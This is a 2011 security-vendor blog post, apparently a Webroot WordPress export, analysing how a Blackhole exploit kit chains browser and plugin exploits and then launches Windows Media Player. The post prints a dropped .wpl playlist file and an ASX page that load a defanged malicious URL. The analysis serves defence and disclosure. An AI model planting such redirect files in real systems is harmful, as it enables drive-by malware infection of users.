{"id":5458,"date":"2011-11-11T10:11:57","date_gmt":"2011-11-11T17:11:57","guid":{"rendered":"http:\/\/blog.webroot.com\/?p=5458"},"modified":"2018-01-30T13:16:01","modified_gmt":"2018-01-30T20:16:01","slug":"this-blackhole-exploit-kit-gives-you-windows-media-player-and-a-whole-lot-more","status":"publish","type":"post","link":"https://www.webroot.com/blog/2011\/11\/11\/this-blackhole-exploit-kit-gives-you-windows-media-player-and-a-whole-lot-more\/","title":{"rendered":"This blackhole exploit kit gives you Windows Media Player and a whole lot more"},"content":{"rendered":"

By Mike Johnson<\/strong><\/a><\/p>\n

As a follow-up to the Blackhole Exploit posting<\/a>, I thought I would share one aspect of my job that I truely enjoy: Discovery.<\/p>\n

While investigating some active urls being served up via a blackhole kit, I noticed something quite odd, as I would\u00a0end up on\u00a0sites that had\u00a0malicious\u00a0code injected into their webpages.<\/p>\n

Once the redirection to the blackhole kit was initiated, I saw the usual exploits taking place, first being Internet Explorer and Adobe Flash, then onto Adobe Reader and Java.<\/p>\n

This time, the kit\u00a0didn’t\u00a0stop there. Internet Explorer proceeded to launch Windows Media Player. Since I had never used it on this test machine, the Windows Media Player install sequence initiated, causing the windows media player setup screen to appear in order to\u00a0finalize\u00a0its installation.<\/p>\n

I became\u00a0curious as to what Windows Media Player is being used for.\u00a0Unfortunately\u00a0in this case, I couldn’t see where any files were called down to the machine and did not have any type of network analyzer running.<\/p>\n

\"\"<\/a><\/p>\n

<\/p>\n

It is possible this is a specific plugin request from the people running this particular exploit kit. Looking at some of the images below, there is definitly some network traffic initiated using Windows Media Player.<\/p>\n

\"\"<\/a><\/p>\n

\"\"<\/a><\/p>\n

It seems as soon as Internet Explorer calls Windows Media Player, there is a small Windows Media Player file dropped and executed:
\n(%userprofile%Application DataMicrosoftMedia Player********.wpl)<\/p>\n

This file contains a small amount of code inside it which basically appears to load a malicous url in Windows Media Player. The contents of the wpl file look like this:<\/p>\n

<?wpl version=”1.0″?><\/p>\n

<smil><\/p>\n

<head><\/p>\n

<meta name=”Generator” content=”Microsoft Windows Media Player — 9.0.0.4503″\/><\/p>\n

<title\/><\/p>\n

<\/head><\/p>\n

<body><\/p>\n

<seq><\/p>\n

<media src=”hxxp:\/\/[removed].com\/content\/hcp_asx.php?f=26″\/><\/p>\n

<\/seq><\/p>\n

<\/body><\/p>\n

<\/smil><\/p>\n

This URL leads to a page looking similar to this:<\/p>\n

<ASX VERSION=”3.0″><PARAM name=’HTMLView’ value=”http:\/\/[removed].com\/content\/pch.php?f=26″\/><ENTRY><REF href=”http:\/\/[removed].com\/content\/1×1.gif”\/><\/ENTRY><\/ASX><\/p>\n

We have only tested this on Windows XP SP3 using Internet Explorer 8 and Windows Media Player 9.0.0.4503. I am currently unsure if this particular exploit will work on Windows Vista or Windows 7.<\/p>\n

The main reason this caught my attention is that most, if not all, updates for Windows Media Player are only<\/strong> included in the Optional Updates —\u00a0not the Critical Updates we all see monthly from Microsoft<\/a>.<\/p>\n","protected":false},"excerpt":{"rendered":"

By Mike Johnson As a follow-up to the Blackhole Exploit posting, I thought I would share one aspect of my job that I truely enjoy: Discovery. While investigating some active urls being served up via a blackhole kit, I noticed something quite odd, as I would\u00a0end up on\u00a0sites that had\u00a0malicious\u00a0code injected into their webpages. Once […]<\/p>\n","protected":false},"author":65,"featured_media":17048,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[3005],"tags":[],"yst_prominent_words":[9177,9173,9167,9169,4905,4911,9175,3619,9179,3489,5641,6519,4723,3911,9171,4807,6517,3471,7001,6999],"acf":[],"_links":{"self":[{"href":"https://www.webroot.com/blog/wp-json\/wp\/v2\/posts\/5458"}],"collection":[{"href":"https://www.webroot.com/blog/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https://www.webroot.com/blog/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https://www.webroot.com/blog/wp-json\/wp\/v2\/users\/65"}],"replies":[{"embeddable":true,"href":"https://www.webroot.com/blog/wp-json\/wp\/v2\/comments?post=5458"}],"version-history":[{"count":1,"href":"https://www.webroot.com/blog/wp-json\/wp\/v2\/posts\/5458\/revisions"}],"predecessor-version":[{"id":17090,"href":"https://www.webroot.com/blog/wp-json\/wp\/v2\/posts\/5458\/revisions\/17090"}],"wp:featuredmedia":[{"embeddable":true,"href":"https://www.webroot.com/blog/wp-json\/wp\/v2\/media\/17048"}],"wp:attachment":[{"href":"https://www.webroot.com/blog/wp-json\/wp\/v2\/media?parent=5458"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https://www.webroot.com/blog/wp-json\/wp\/v2\/categories?post=5458"},{"taxonomy":"post_tag","embeddable":true,"href":"https://www.webroot.com/blog/wp-json\/wp\/v2\/tags?post=5458"},{"taxonomy":"yst_prominent_words","embeddable":true,"href":"https://www.webroot.com/blog/wp-json\/wp\/v2\/yst_prominent_words?post=5458"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}